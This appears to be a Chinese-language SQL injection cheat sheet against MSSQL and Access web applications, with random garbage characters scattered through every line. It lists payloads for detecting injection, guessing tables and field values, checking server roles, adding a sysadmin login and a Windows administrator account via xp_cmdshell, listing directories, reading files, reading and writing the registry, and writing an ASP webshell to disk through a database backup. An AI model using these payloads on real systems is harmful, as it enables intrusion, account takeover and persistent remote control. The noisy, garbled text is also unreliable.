1.判断是否有注入;and 1=1 ;and 1=2 KN?6;G{
2.初步判断是否是mssql ;and user>0 ukv tQz)
`5~ +,/Ys
3.注入参数是字符'and [查询条件] and ''=' ] )F7)
@BrMl%gV
4.搜索时没过滤参数的'and [查询条件] and '%25'=' x7vctjM|
u`olW%C/T
5.判断数据库系统 Q>R>R*1.j
F29va
;and (select count(*) from sysobjects)>0 mssql {X*^s5{;H
;b`[&g
;and (select count(*) from msysobjects)>0 access j6
>IX/<
{);M
Pl<;[cB
u{FDdR9<
6.猜数据库 ;and (select Count(*) from [数据库名])>0 E[O<S B
I
zCOgBT~p
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 X^\>:<
t9Y=m6
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 P%#*-zCCx
Vpr/
9.(1)猜字段的ascii值(access) KAsS[
*1 G>YH
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 p_UlK8rb
uA$<\fnz
(2)猜字段的ascii值(mssql) m85WA
#
`
?x+Z)`w_
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 =)E,8L
6m VuyI
10.测试权限结构(mssql) t^[8RhD
u5~Ns&o&N
xS7$%w['
h.!}3\Y
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Gcb|W&
H*bs31i{
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- @q"m5
25NTIzI@@
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- -F=v6N {
@xeAc0.^
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- "Tm[t?FMbe
,^gyH
\
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- +3a?`Z
PG8^.)]M
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- F q!fWl
y!5$/`AF
;and 1=(select IS_MEMBER('db_owner'));-- (ewe"N+
>7roe []-|
e5.h ?
<,AS8^$X[
11.添加mssql和系统的帐户 _DrJVC~6@
d/}SAvtt
;exec master.dbo.sp_addlogin username;-- etd&..]J
;exec master.dbo.sp_password null,username,password;-- h'$QC )P
rJa$9B*^
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- kGL1!=>
n39t}`WIl
;exec master.dbo.xp_cmdshell 'net user username password .TE?KI
R/^u/~<
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- `+t.!tv!
l~D N1z6`
;exec master.dbo.xp_cmdshell 'net user username password /add';-- >6oOZbUY0
|A%<Z(
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- :QWq"cBem
J*l4|^i<
oQv3GpO
\}~s2Y5j
12.(1)遍历目录 Y-'78BJk
UxD5eJJ
;create table dirs(paths varchar(100), id int) }<z_Q_b+e
q %0Cg=
;insert dirs exec master.dbo.xp_dirtree 'c:\' hky;CD~$
S!PzLTc
;and (select top 1 paths from dirs)>0 +dBz`WD
LTJc,3\,
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) % aUsOB-RV
>HPdzLY?
DAg58
=qJ
RNPbH.
(2)遍历目录 66#"
7 ~ztwL
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- +fx8muz:y
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 }Z
TGi,Pc
^1Xt]T`e
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 }n7th
bu&t'?zx!
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 aF|d^
`z0{S!
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 XE3'`D!
,Rx{yf]k
?0_7?yTR/
.bVmqR`
13.mssql中的存储过程 =<@\,xN>C
UZEI:k,dv
xp_regenumvalues 注册表根键, 子键 x f4{r+
$
n,Z
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 F`nb21{0y&
QQe;1O
xp_regread 根键,子键,键值名 KluA
/H:I 68~
;exec xp_regread KOg?FmD
[TF8'jI0
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ^uS/r#l
OG3/-K 8R
xp_regwrite 根键,子键, 值名, 值类型, 值 b dJ+@r
E42eOGp9i
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 @<M*qK1h
B/Gd(S`@q
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 cL8#S>>u.
Omi^>c4G
xp_regdeletevalue 根键,子键,值名 ?EU\}N J
N~pIC2Woo
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 r}u%#G+K,
H0a/(4/xg
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 CzV(cSS9-
{FN;'Uc
Jti(b*~
:Vg}V"QR
14.mssql的backup创建webshell d bS
+
/D_+{dtE
use model `]$?uQ
M+wt__vHf
create table cmd(str image); sA9&/p/
-ng=l;
insert into cmd(str) values (''); 19(Dj&x
>x3ug]Bu
backup database model to disk='c:\l.asp'; Px M!U!t
kl1Y] ?z}
E3a_8@ZB7
WxbsD S;
15.mssql内置函数 6|J'>)
7GZgu$'
;and (select @@version)>0 获得Windows的版本号 I8H%=Kb?9
IMQ]1uq0$
;and user_name()='dbo' 判断当前系统的连接用户是不是sa dSIH9D
U,1AfzlF
;and (select user_name())>0 爆当前系统的连接用户 /,5Z-Z*wq
Je4Z(kj 0
;and (select db_name())>0 得到当前连接的数据库 Ip}Vb6}
rVQX7l# YI
rOD1_X-
_SZ5P>GIU
16.简洁的webshell gQ~5M'#
oUx[+Gnv
use model ^IgY d*5
jnuY{0(&
create table cmd(str image); IGFGa@C
?IX!+>.H
insert into cmd(str) values (''); OlxX.wP
Q\{x)|{$
backup database model to disk='g:\wwwtest\l.asp';